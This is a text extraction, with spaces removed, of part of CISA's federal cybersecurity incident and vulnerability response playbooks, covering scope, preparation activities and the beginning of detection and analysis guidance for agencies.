《網絡安全事件和漏洞響應手冊》

TLP:WHITE

TLP:WHITE

CISA|CybersecurityandInfrastructureSecurityAgency2

CONTENTS

Introduction 3

Overview 3

Scope 3

Audience 4

IncidentResponsePlaybook 5

IncidentResponseProcess 5

PreparationPhase 6

Detection&Analysis 10

Containment 14

Eradication&Recovery 15

Post-IncidentActivities 16

Coordination 17

VulnerabilityResponsePlaybook 21

Preparation 21

VulnerabilityResponseProcess 22

Identification 22

Evaluation 23

Remediation 24

ReportingandNotification 24

AppendixA:KeyTerms 25

AppendixB:IncidentResponseChecklist 27

AppendixC:IncidentResponsePreparationChecklist 35

AppendixE:VulnerabilityandIncidentCategories 38

AppendixF:SourceText 39

AppendixG:Whole-of-GovernmentRolesandResponsibilities 41

TLP:WHITE

TLP:WHITE

CISA|CybersecurityandInfrastructureSecurityAgency3

INTRODUCTION

TheCybersecurityandInfrastructureSecurityAgency(CISA)iscommittedtoleadingtheresponsetocybersecurityincidentsandvulnerabilitiestosafeguardthenation'scriticalassets.Section6ofExecutiveOrder14028directedDHS,viaCISA,to“developastandardsetofoperationalprocedures(playbook)tobeusedinplanningandconductingcybersecurityvulnerabilityandincidentresponseactivityrespectingFederalCivilianExecutiveBranch(FCEB)InformationSystems.”

1

Overview

Thisdocumentpresentstwoplaybooks:oneforincidentresponseandoneforvulnerabilityresponse.TheseplaybooksprovideFCEBagencieswithastandardsetofprocedurestoidentify,coordinate,remediate,recover,andtracksuccessfulmitigationsfromincidentsandvulnerabilitiesaffectingFCEBsystems,data,andnetworks.Inaddition,futureiterationsoftheseplaybooksmaybeusefulfororganizationsoutsideoftheFCEBtostandardizeincidentresponsepractices.Workingtogetheracrossallfederalgovernmentorganizationshasproventobeaneffectivemodelforaddressingvulnerabilitiesandincidents.Buildingonlessonslearnedfrompreviousincidentsandincorporatingindustrybestpractices,CISAintendsfortheseplaybookstoevolvethefederalgovernment’spracticesforcybersecurityresponsethroughstandardizingsharedpracticesthatbringtogetherthebestpeopleandprocessestodrivecoordinatedactions.

Thestandardizedprocessesandproceduresdescribedintheseplaybooks:

?Facilitatebettercoordinationandeffectiveresponseamongaffectedorganizations,

?Enabletrackingofcross-organizationalsuccessfulactions,

?Allowforcatalogingofincidentstobettermanagefutureevents,and

?Guideanalysisanddiscovery.

Agenciesshouldusetheseplaybookstohelpshapeoveralldefensivecyberoperationstoensureconsistentandeffectiveresponseandcoordinatedcommunicationofresponseactivities

Scope

TheseplaybooksareforFCEBentitiestofocusoncriteriaforresponseandthresholdsforcoordinationandreporting.TheyincludecommunicationsbetweenFCEBentitiesandCISA;theconnectivecoordinationbetweenincidentandvulnerabilityresponseactivities;andcommondefinitionsforkeycybersecuritytermsandaspectsoftheresponseprocess.Responseactivitiesinscopeofthisplaybookincludethose:

?InitiatedbyanFCEBagency(e.g.,alocaldetectionofmaliciousactivityordiscoveryofavulnerability)

?InitiatedbyCISA(e.g.,aCISAalertordirective)orotherthirdparties,includinglawenforcement,intelligenceagencies,orcommercialorganizations,contractors,andserviceproviders

TheIncidentResponsePlaybookappliestoincidentsthatinvolveconfirmedmaliciouscyberactivityandforwhichamajorincident(asdefinedbytheOfficeofManagementandBudget[OMB]in

1

ExecutiveOrder(EO)14028:ImprovingtheNation'sCybersecurity

TLP:WHITE

TLP:WHITE

CISA|CybersecurityandInfrastructureSecurityAgency4

MemorandumM-20-04

2

orsuccessormemorandum)hasbeendeclaredornotyetbeenreasonablyruledout.TheVulnerabilityResponsePlaybookappliestovulnerabilitiesbeingactivelyexploitedinthewild.AsrequiredbyEO14028,theDirectorofOMBwillissueguidanceonFCEBagencyuseoftheseplaybooks.

Note:theseplaybooksdonotcoverresponseactivitiesthatinvolvethreatstoclassifiedinformationorNationalSecuritySystems(NSS)asdefinedby44U.S.C.3552(b)(6).SeeCNSSI1010

3

forcoordination/reportingguidanceforincidentsspecifictoNSSorsystemsthatprocessclassifiedinformation.

Audience

TheseplaybooksapplytoallFCEBagencies,informationsystemsusedoroperatedbyanagency,acontractorofanagency,oranotherorganizationonbehalfofanagency.Itisthepolicyofthefederalgovernmentthatinformationandcommunicationstechnology(ICT)serviceproviderswhohavecontractedwithFCEBagenciesmustpromptlyreportincidentstosuchagenciesandtoCISA.

4

2

OfficeofManagementandBudget(OMB)MemorandumM-20-04:FiscalYear2019-2020GuidanceonFederalInformation

SecurityandPrivacyManagementRequirements

3

CommitteeonNationalSecuritySystems

4

EO14028,Sec.2.RemovingBarrierstoSharingThreatInformation

TLP:WHITE

CISA|CybersecurityandInfrastructureSecurityAgency5

INCIDENTRESPONSEPLAYBOOK

Whentousethisplaybook

Usethisplaybookforincidentsthatinvolveconfirmedmaliciouscyberactivityforwhichamajorincidenthasbeendeclaredornotyetbeenreasonablyruledout.

Forexample:

?Incidentsinvolvinglateralmovement,credentialaccess,exfiltrationofdata

?Networkintrusionsinvolvingmorethanoneuserorsystem

?Compromisedadministratoraccounts

Thisplaybookdoesnotapplytoactivitythatdoesnotappeartohavesuchmajorincidentpotential,suchas:

?“Spills”ofclassifiedinformationorotherincidentsthatarebelievedtoresultfromunintentionalbehavioronly

?Usersclickingonphishingemailswhennocompromiseresults

?Commoditymalwareonasinglemachineorlosthardwarethat,ineithercase,isnotlikelytoresultindemonstrableharmtothenationalsecurityinterests,foreignrelations,oreconomyoftheUnitedStatesortothepublicconfidence,civilliberties,orpublichealthandsafetyoftheAmericanpeople.

Thisplaybookprovidesastandardizedresponse

processforcybersecurityincidentsanddescribes

theprocessandcompletionthroughtheincident

responsephasesasdefinedinNationalInstituteof

StandardsandTechnology(NIST)Special

Publication(SP)800-61Rev.2,

5

including

preparation,detectionandanalysis,containment,

eradicationandrecovery,andpost-incident

activities.Thisplaybookdescribestheprocess

FCEBagenciesshouldfollowforconfirmed

maliciouscyberactivityforwhichamajorincident

hasbeendeclaredornotyetbeenreasonablyruled

out.

?Incidentresponsecanbeinitiatedbyseveraltypesofevents,includingbutnotlimitedto:

?Automateddetectionsystemsorsensoralerts

?Agencyuserreport

?Contractororthird-partyICTserviceproviderreport

?Internalorexternalorganizationalcomponentincidentreportorsituationalawarenessupdate

?Third-partyreportingofnetworkactivitytoknowncompromisedinfrastructure,detectionofmaliciouscode,lossofservices,etc.

?Analyticsorhuntteamsthatidentifypotentiallymaliciousorotherwiseunauthorizedactivity

IncidentResponseProcess

Theincidentresponseprocessstartswiththedeclarationoftheincident,asshowninFigure1.Inthiscontext,“declaration”referstotheidentificationofanincidentandcommunicationtoCISAandagencynetworkdefendersratherthanformaldeclarationofamajorincidentasdefinedinapplicablelawandpolicy.Succeedingsections,whichareorganizedbyphasesoftheIRlifecycle,describeeachstepinmoredetail.Manyactivitiesareiterativeandmaycontinuouslyoccurandevolveuntiltheincidentisclosedout.Figure1illustratesincidentresponseactivitiesintermsofthesephases,andAppendixBprovidesacompanionchecklisttotrackactivitiestocompletion.

5

NISTSpecialPublication(SP)800-61Rev.2:ComputerSecurityIncidentHandlingGuide

TLP:WHITE

TLP:WHITE

CISA|CybersecurityandInfrastructureSecurityAgency6

Figure1:IncidentResponseProcess

PreparationPhase

Prepareformajorincidentsbeforetheyoccurtomitigateanyimpactontheorganization.Preparationactivitiesinclude:

?Documentingandunderstandingpoliciesandproceduresforincidentresponse

?Instrumentingtheenvironmenttodetectsuspiciousandmaliciousactivity

?Establishingstaffingplans

?Educatingusersoncyberthreatsandnotificationprocedures

?Leveragingcyberthreatintelligence(CTI)toproactivelyidentifypotentialmaliciousactivity

Definebaselinesystemsandnetworksbeforeanincidentoccurstounderstandthebasicsof“normal”activity.Establishingbaselinesenablesdefenderstoidentifydeviations.Preparationalsoincludes

?Havinginfrastructureinplacetohandlecomplexincidents,includingclassifiedandout-of-bandcommunications

?Developingandtestingcoursesofaction(COAs)forcontainmentanderadication

?Establishingmeansforcollectingdigitalforensicsandotherdataorevidence

Thegoaloftheseitemsistoensureresilientarchitecturesandsystemstomaintaincriticaloperationsinacompromisedstate.Activedefensemeasuresthatemploymethodssuchasredirectionandmonitoringofadversaryactivitiesmayalsoplayaroleindevelopingarobustincidentresponse.

6

6Forexample,“Deception:Mislead,confuse,hidecriticalassetsfrom,orexposecovertlytaintedassetstotheadversary,”asdefinedin

NISTSP800-160Vol.2:DevelopingCyberResilientSystems:ASystemsSecurityEngineeringApproach

.

TLP:WHITE

TLP:WHITE

CISA|CybersecurityandInfrastructureSecurityAgency7

PreparationActivities

PoliciesandProcedures

Documentincidentresponseplans,includingprocessesandproceduresfordesignatingacoordinationlead(incidentmanager).Putpoliciesandproceduresinplacetoescalateandreportmajorincidentsandthosewithimpactontheagency’smission.Documentcontingencyplansforadditionalresourcingand“surgesupport”withassignedrolesandresponsibilities.Policiesandplansshouldaddressnotification,interaction,andevidencesharingwithlawenforcement.

Instrumentation

Developandmaintainanaccuratepictureofinfrastructure(systems,networks,cloudplatforms,andcontractor-hostednetworks)bywidelyimplementingtelemetrytosupportsystemandsensor-baseddetectionandmonitoringcapabilitiessuchasantivirus(AV)software;endpointdetectionandresponse(EDR)solutions;

7

datalossprevention(DLP)capabilities;intrusiondetectionandpreventionsystems(IDPS);authorization,host,applicationandcloudlogs;

8

networkflows,packetcapture(PCAP);andsecurityinformationandeventmanagement(SIEM)systems.MonitorforalertsgeneratedbyCISA'sEINSTEINintrusiondetectionsystemandContinuousDiagnosticsandMitigation(CDM)programtodetectchangesincyberposture.Implementadditionalrequirementsforlogging,logretention,andlogmanagementbasedonExecutiveOrder14028,Sec.8.ImprovingtheFederalGovernment'sInvestigativeandRemediationCapabilities,

9

andensurethoselogsarecollectedcentrally.

TrainedResponsePersonnel

Ensurepersonnelaretrained,exercised,andreadytorespondtocybersecurityincidents.Train

allstaffingresourcesthatmaydrawfromin-housecapabilities,availablecapabilitiesataparentagency/department,third-partyorganization,oracombinationthereof.Conductregularrecoveryexercisestotestfullorganizationalcontinuityofoperationsplan(COOP)andfailover/backup/recoverysystemstobesuretheseworkasplanned.

CyberThreatIntelligence

Activelymonitorintelligencefeedsforthreatorvulnerabilityadvisoriesfromgovernment,trustedpartners,opensources,andcommercialentities.Cyberthreatintelligencecanincludethreatlandscapereporting,threatactorprofilesandintents,organizationaltargetsandcampaigns,aswellasmorespecificthreatindicatorsandcoursesofaction.IngestcyberthreatindicatorsandintegratedthreatfeedsintoaSIEM,anduseotherdefensivecapabilitiestoidentifyandblockknownmaliciousbehavior.Threatindicatorscaninclude:

?Atomicindicators,suchasdomainsandIPaddresses,thatcandetectadversaryinfrastructureandtools

?Computedindicators,suchasYararulesandregularexpressions,thatdetectknownmaliciousartifactsorsignsofactivity

?Patternsandbehaviors,suchasanalyticsthatdetectadversarytactics,techniques,andprocedures(TTPs)

Atomicindicatorscaninitiallybevaluabletodetectsignsofaknowncampaign.However,becauseadversariesoftenchangetheirinfrastructure(e.g.,wateringholes,botnets,C2servers)betweencampaigns,the“shelf-life”ofatomicindicatorstodetectnewadversaryactivityislimited.Inaddition,advancedthreatactors

7

EO14028,Sec.7.ImprovingDetectionofCybersecurityVulnerabilitiesandIncidentsonFederalGovernmentNetworks

8

NISTSP800-92:GuidetoComputerSecurityLogManagement

9

E014028,Sec.8.ImprovingtheFederalGovernment'sInvestigativeandRemediationCapabilities

TLP:WHITE

TLP:WHITE

CISA|CybersecurityandInfrastructureSecurityAgency8

mightleveragedifferentinfrastructureagainstdifferenttargetsorswitchtonewinfrastructureduringacampaignwhentheiractivitiesaredetected.Finally,adversariesoftenhideintheirtargetedenvironments,usingnativeoperatingsystemutilitiesandotherresourcestoachievetheirgoals.Forthesereasons,agenciesshouldusepatternsandbehaviors,oradversaryTTPs,toidentifymaliciousactivitywhenpossible.Althoughmoredifficulttoapplydetectionmethodsandverifyapplication,TTPsprovidemoreusefulandsustainablecontextaboutthreatactors,theirintentions,andtheirmethodsthanatomicindicatorsalone.

TheMITREATT&CK?

framework

documentsandexplainsadversaryTTPsindetailmakingitavaluableresourcefornetworkdefenders.

10

Sharingcyberthreatintelligenceisacriticalelementofpreparation.FCEBagenciesarestronglyencouragedtocontinuouslysharecyberthreatintelligence—includingadversaryindicators,TTPs,andassociateddefensivemeasures(alsoknownas“countermeasures”)—withCISAandotherpartners.Theprimarymethodforsharingcyberthreatinformation,indicators,andassociateddefensivemeasureswithCISAisviatheAutomatedIndicatorSharing(AIS)program.

11

FCEBagenciesshouldbeenrolledinAIS.IftheagencyisnotenrolledinAIS,contactCISAformoreinformation.

12

AgenciesshouldusetheCyberThreatIndicatorandDefensiveMeasuresSubmissionSystem—asecure,web-enabledmethod—tosharewithCISAcyberthreatindicatorsanddefensivemeasuresthatarenotapplicableorappropriatetoshareviaAIS.

13

10See

BestPracticesforMITREATT&CK?Mapping

FrameworkforguidanceonusingATT&CKtoanalyzeandreportoncybersecuritythreats.

11

CISAAutomatedIndicatorSharing

12

CISAAutomatedIndicatorSharing

ActiveDefense

FCEBagencieswithadvanceddefensivecapabilitiesandstaffmightestablishactivedefensecapabilities—suchastheabilitytoredirectanadversarytoasandboxorhoneynetsystemforadditionalstudy,or“darknets”—todelaytheabilityofanadversarytodiscovertheagency’slegitimateinfrastructure.Networkdefenderscanimplementhoneytokens(fictitiousdataobjects)andfakeaccountstoactascanariesformaliciousactivity.Thesecapabilitiesenabledefenderstostudytheadversary’sbehaviorandTTPsandtherebybuildafullpictureofadversarycapabilities.

CommunicationsandLogistics

Establishlocalandcross-agencycommunicationproceduresandmechanismsforcoordinatingmajorincidentswithCISAandothersharingpartnersanddeterminetheinformationsharingprotocolstouse(i.e.,agreed-uponstandards).Definemethodsforhandlingclassifiedinformationanddata,ifrequired.Establishcommunicationchannels(chatrooms,phonebridges)andmethodforout-of-bandcoordination.

14

OperationalSecurity(OPSEC)

TakestepstoensurethatIRanddefensivesystemsandprocesseswillbeoperationalduringanattack,particularlyintheeventofpervasivecompromises—suchasaransomwareattackoroneinvolvinganaggressiveattackerthatmayattempttounderminedefensivemeasuresanddistractormisleaddefenders.Thesemeasuresinclude:

?SegmentingandmanagingSOCsystemsseparatelyfromthebroaderenterpriseITsystems,

13

DHSCISACyberThreatIndicatorandDefensiveMeasure

SubmissionSystem

14

NISTSP800-47Rev.1:ManagingtheSecurityof

InformationExchanges

TLP:WHITE

TLP:WHITE

CISA|CybersecurityandInfrastructureSecurityAgency9

?Managingsensorsandsecuritydevicesviaout-of-bandmeans,

?Notifyingusersofcompromisedsystemsviaphoneratherthanemail,

?Usinghardenedworkstationstoconductmonitoringandresponseactivities,and

?Ensuringthatdefensivesystemshaverobustbackupandrecoveryprocesses.

Avoid“tippingoff”anattackerbyhavingprocessesandsystemstoreducethelikelihoodofdetectionofIRactivities(e.g.,donotsubmitmalwaresamplestoapublicanalysisserviceornotifyusersofpotentiallycomprisedmachinesviaemail).

TechnicalInfrastructure

Implementcapabilitiestocontain,replicate,analyze,reconstitute,anddocumentcompromisedhosts;implementthecapabilitytocollectdigitalforensicsandotherdata.Establishsecurestorage(i.e.,onlyaccessiblebyincidentresponders)forincidentdataandreporting.Providemeansforcollectingforensicevidence,suchasdiskandactivememoryimaging,andmeansforsafelyhandlingmalware.Obtain

analysistoolsandsandboxsoftwareforanalyzingmalware.Implementaticketingorcasemanagementsystemthatcapturespertinentdetailsof:

?Anomalousorsuspiciousactivity,suchasaffectedsystems,applications,andusers;

?Activitytype;

?Specificthreatgroup(s);

?Adversarytactics,techniques,andprocedures(TTPs)employed;and

?Impact.

DetectActivity

Leveragethreatintelligencetocreaterulesandsignaturestoidentifytheactivityassociatedwiththeincidentandtoscopeitsreach.Configuretoolsandanalyzelogsandalerts.Lookforsignsofincidentactivityandpotentiallyrelatedinformationtodeterminethetypeofincident,e.g.,malwareattack,systemcompromise,sessionhijack,datacorruption,dataexfiltration,etc.

SeeAppendixCforachecklistforpreparationactivities.

TLP:WHITE

TLP:WHITE

CISA|CybersecurityandInfrastructureSecurityAgency10

Detection&Analysis

Themostchallengingaspectoftheincidentresponseprocessisoftenaccuratelydetectingandassessingcybersecurityincidents:determiningwhetheranincidenthasoccurredand,ifso,thetype,extent,andmagnitudeofthecompromisewithincloud,operationaltechnology(OT),hybrid,host,andnetworksystems.Todetectandanalyzeevents,implementdefinedprocesses,appropriatetechnology,and

sufficientbaselineinformationtomonitor,detect,andalertonanomalousandsuspiciousactivity.Ensurethereareprocedurestodeconflictpotentialincidentswithauthorizedactivity(e.g.,confirmthatasuspectedincidentisnotsimplyanetworkadministratorusingremoteadmintoolstoperformsoftwareupdates).AstheU.S.government’sleadforassetresponse,CISAwillpartnerwithaffectedagenciesinallaspectsofthedetectionandanalysisprocess.

Detection&AnalysisActivities

DeclareIncident

DeclareanincidentbyreportingittoCISAat

/

andalertingagencyITleadershiptotheneedforinvestigationandresponse.CISAcanassistindeterminingtheseverityoftheincidentandwhetheritshouldbedeclaredamajorincident.Note:FCEBagenciesmustpromptlyreportallcybersecurityincidents,regardlessofseverity,toCISA

DetermineInvestigationScope

Useavailabledatatoidentifythetypeofaccess,theextenttowhichassetshavebeenaffected,thelevelofprivilegeattainedbytheadversary,andtheoperationalorinformationalimpact.Discoverassociatedmaliciousactivitybyfollowingthetrailofnetworkdata;discoverassociatedhost-basedartifactsbyexamininghost,firewall,andproxylogsalongwithothernetworkdata,suchasroutertraffic.Initialscopingofanincidenttodetermineadversarialactivitymayincludeanalyzingresultsfrom:

?Anautomateddetectionsystemorsensor;

?Areportfromauser,contractor,orthird-partyinformationandcommunicationtechnologies(ICT)serviceprovider;or

?Anincidentreportorsituationalawarenessupdatefromotherinternalorexternalorganizationalcomponents.

15

NISTSP800-61Rev.2:ComputerSecurityIncident

HandlingGuide

CollectandPreserveData

Collectandpreservedataforincidentverification,categorization,prioritization,mitigation,reporting,andattribution.Whennecessaryandpossible,suchinformationshouldbepreservedandsafeguardedasbestevidenceforuseinanypotentiallawenforcementinvestigation.Collectdatafromtheperimeter,theinternalnetwork,andtheendpoint(serverandhost).Collectaudit,transaction,intrusion,connection,systemperformance,anduseractivitylogs.Whenanendpointrequiresforensicanalysis,captureamemoryanddiskimageforevidencepreservation.Collectevidence,includingforensicdata,accordingtoproceduresthatmeetallapplicablepoliciesandstandardsandaccountforitinadetailedlogthatiskeptforallevidence.Formoreinformation,seeNISTComputerSecurityIncidentHandlingGuide,SP800-61r2.

15

Extractallrelevantthreatinformation(atomic,computed,andbehavioralindicatorsandcountermeasures)tosharewithIRteamsandwithCISA.

PerformTechnicalAnalysis

Developatechnicalandcontextualunderstandingoftheincident.Correlateinformation,assessanomalousactivityagainstaknownbaselinetodeterminerootcause,anddocumentadversaryTTPstoenableprioritizationofthesubsequent

TLP:WHITE

TLP:WHITE

CISA|CybersecurityandInfrastructureSecurityAgency11

responseactivities.Thegoalofthisanalysisistoexaminethebreadthofdatasourcesthroughouttheenvironmenttodiscoveratleastsomepartofanattackchain,ifnotallofit.Asinformationevolvesandtheinvestigationprogresses,updatethescopetoincorporatenewinformation.

CorrelateEventsandDocumentTimeline

Acquire,store,andanalyzelogstocorrelateadversarialactivity.Table1presentsanexampleoflogsandeventdatathatarecommonlyemployedtodetectandanalyzeattackeractivities.

16

,

17

Asimpleknowledgebaseshouldbeestablishedforreferenceduringresponsetotheincident.Thoroughlydocumenteverysteptakenduringthisandsubsequentphases.Createatimelineofallrelevantfindings.Thetimelinewillallowtheteamtoaccountforalladversaryactivityonthenetworkandwillassistincreatingthefindingsreportattheconclusionoftheresponse.

IdentifyAnomalousActivity

Assessandprofileaffectedsystemsandnetworksforsubtleactivitythatmightbeadversarybehavior.Adversarieswilloftenuselegitimate,nativeoperatingsystemutilitiesandscriptinglanguagesoncetheygainafootholdinanenvironmenttoavoiddetection.Thisprocesswillenabletheteamtoidentifydeviationsfromtheestablishedbaselineactivityandcanbeparticularlyimportantinidentifyingactivitiessuchasattemptstoleveragelegitimatecredentialsandnativecapabilitiesintheenvironment.

IdentifyRootCauseandEnablingConditions

Attempttoidentifytherootcauseoftheincidentandcollectthreatinformationthatcanbeusedinfurthersearchesandtoinformsubsequentresponseefforts.Identifytheconditionsthatenabledtheadversarytoaccessandoperate

16Derivedfromthe

MITREATT&CK?

Framework.Note:thistableisarepresentativesamplingofcommontactics,techniques,andrelatedlogs,andisnotintendedtobecomplete.

withintheenvironment.Theseconditionswillinformtriageandpost-incidentactivity.Assessnetworksandsystemsforchangesthatmayhavebeenmadetoeitherevadedefensesorfacilitatepersistentaccess.

GatherIncidentIndicators

Identifyanddocumentindicatorsthatcanbeusedforcorrelativeanalysisonthenetwork.Indicatorscanprovideinsightintotheadversary’scapabilitiesandinfrastructure.Indicatorsasstandaloneartifactsarevaluableintheearlystagesofincidentresponse.

AnalyzeforCommonAdversaryTTPs

CompareTTPstoadversaryTTPsdocumentedinATT&CKandanalyzehowtheTTPsfitintotheattacklifecycle.TTPsdescribe“why,”“what,”and“how.”Tacticsdescribethetechnicalobjectiveanadversaryistryingtoachieve(“why”),techniquesaredifferentmechanismstheyusetoachieveit(“what”),andproceduresareexactlyhowtheadversaryachievesaspecificresult(“how”).RespondingtoTTPsenablesdefendersto